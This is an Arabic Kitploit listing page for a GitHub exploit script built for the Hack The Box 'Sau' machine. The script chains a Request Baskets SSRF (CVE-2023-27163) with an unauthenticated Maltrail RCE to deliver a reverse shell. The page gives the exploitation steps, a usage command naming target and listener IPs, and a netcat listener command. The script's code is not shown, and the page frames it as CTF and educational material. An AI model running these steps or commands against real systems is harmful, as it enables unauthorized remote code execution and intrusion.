Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
htb-sau-exploit-chain — سلسلة استغلال آلية لآلة HTB Sau — CVE-2023-27163 (SSRF) + ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها في Maltrail ← قشرة عكسية | Kitploit
أدوات/GitHubGitHub/tombstoneghost/htb-sau-exploit-chain
توليد الحمولةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubtombstoneghost/htb-sau-exploit-chain

htb-sau-exploit-chain

سلسلة استغلال آلية لآلة HTB Sau — CVE-2023-27163 (SSRF) + ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها في Maltrail ← قشرة عكسية

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
4منذ 4 أشهرلم تتم المراجعة بعد
مشاركة

سلسلة استغلال HTB Sau — CVE-2023-27163 (SSRF) + أتمتة RCE في Maltrail

نص استغلال بلغة بايثون يجمع بين CVE-2023-27163 (Server-Side Request Forgery في Request Baskets ≤ 1.2.1) وثغرة تنفيذ أكواد عن بُعد غير مصادق عليها في Maltrail 0.53، لتسليم قشرة عكسية. مصمم لجهاز Hack The Box Sau.


📌 نظرة عامة

يقوم هذا السكريبت بأتمتة مسار الاستغلال المطلوب للحصول على وصول أولي إلى الهدف من خلال:

  1. استغلال CVE-2023-27163 للحصول على نقطة نهاية bucket قابلة للاستخدام
  2. الاستفادة من الخدمة المكشوفة للتفاعل مع Maltrail
  3. تشغيل ثغرة RCE غير مصادق عليها في Maltrail
  4. تسليم قشرة عكسية إلى جهاز المهاجم

⚙️ الاستخدام

root@kitploit:~
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

مثال:

root@kitploit:~
python3 exploit.py http://10.10.11.224 10.10.14.6 4444

🎧 مستمع Netcat (مهم)

قبل تشغيل الاستغلال، ابدأ مستمعًا على جهازك لاستقبال القشرة العكسية:

root@kitploit:~
nc -lvnp <LISTENER_PORT>

مثال:

root@kitploit:~
nc -lvnp 4444

🧩 المعاملات

المعاملالوصف
TARGET_URLعنوان URL الأساسي للهدف (مثل http://IP)
LISTENER_IPعنوان IP الخاص بجهازك المهاجم
LISTENER_PORTالمنفذ المستخدم لاستقبال القشرة العكسية

🚀 تدفق الاستغلال

  • تسوية عنوان URL للهدف
  • تشغيل CVE-2023-27163 لإنشاء/الوصول إلى سلة طلبات (request basket)
  • استخراج نقطة النهاية القابلة للوصول (bucket_url)
  • استخدام الـ bucket للتفاعل مع Maltrail
  • تنفيذ الحمولة لفتح قشرة عكسية

⚠️ ملاحظات

  • تأكد من أن المستمع يعمل قبل تنفيذ السكريبت
  • أزل الشرطة المائلة / في نهاية عنوان URL للهدف (يتم التعامل معها تلقائيًا في السكريبت)
  • مصمم خصيصًا لجهاز HTB Sau — قد لا يعمل بشكل عام

📚 المراجع

  • CVE-2023-27163 (Request Baskets)
  • Maltrail Unauthenticated RCE

🛑 إخلاء مسؤولية

هذا المشروع مخصص لأغراض تعليمية وللاستخدام في بيئات مصرح بها مثل Hack The Box. لا تستخدمه ضد الأنظمة دون الحصول على إذن مناسب.

تنزيل الأداة